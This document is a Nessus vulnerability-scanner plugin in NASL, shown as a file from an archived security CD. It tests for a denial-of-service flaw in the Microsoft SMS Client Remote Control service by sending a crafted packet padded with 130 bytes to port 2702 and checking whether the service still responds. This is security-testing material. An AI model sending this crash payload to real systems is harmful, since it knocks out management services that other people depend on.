home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mssms_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  74 lines

  1. #
  2. # Noam Rathaus
  3. #
  4. # Subject: Denial of Service (DoS) in Microsoft SMS Client
  5. # From: vuln@hexview.com
  6. # Date: 14.7.2004 21:45
  7.  
  8. if(description)
  9. {
  10.  script_id(13752);
  11.  script_version("$Revision: 1.3 $");
  12.  
  13.  name["english"] = "Denial of Service (DoS) in Microsoft SMS Client";
  14.  
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. Microsoft Systems Management Server provides configuration management
  19. solution for Windows platform. It is widely deployed in medium and large
  20. network environments. A flaw in SMS Remote Control service makes possible to
  21. crash the service remotely leading to the DoS condition.
  22.  
  23. Affected products:
  24. All tests were performed on a client part of Microsoft Systems Management
  25. Server version 2.50.2726.0.
  26.  
  27. Risk factor : Medium";
  28.  
  29.  script_description(english:desc["english"]);
  30.  
  31.  summary["english"] = "Detect the vulnerability of SMS Client";
  32.  
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_DESTRUCTIVE_ATTACK);
  36.  
  37.  script_copyright(english:"This script is Copyright (C) 2004 Noam Rathaus");
  38.  family["english"] = "Denial of Service"; 
  39.  
  40.  script_family(english:family["english"]);
  41.  script_require_ports(2702);
  42.  exit(0);
  43. }
  44.  
  45. debug = 0;
  46.  
  47. port = 2702;
  48. if(get_port_state(port))
  49. {
  50.  soc = open_sock_tcp(port);
  51.  if(soc)
  52.  {
  53.   req = raw_string(0x52, 0x43, 0x48, 0x30, 0x16, 0x00, 0x40, 0x00, 0x52, 0x43, 0x48, 0x45);
  54.   req = string(req, crap(data:raw_string(0x58), length:130));
  55.  
  56.   if (debug)
  57.     {
  58.    display("req: ", req, "\n");
  59.     }
  60.     
  61.   send(socket:soc, data:req);
  62.   sleep(1);
  63.  
  64.   close(soc);
  65.  
  66.     soc = open_sock_tcp(port);
  67.     if (!soc)
  68.     {
  69.      security_warning(port:port);
  70.     }
  71.  }
  72. }
  73.  
  74.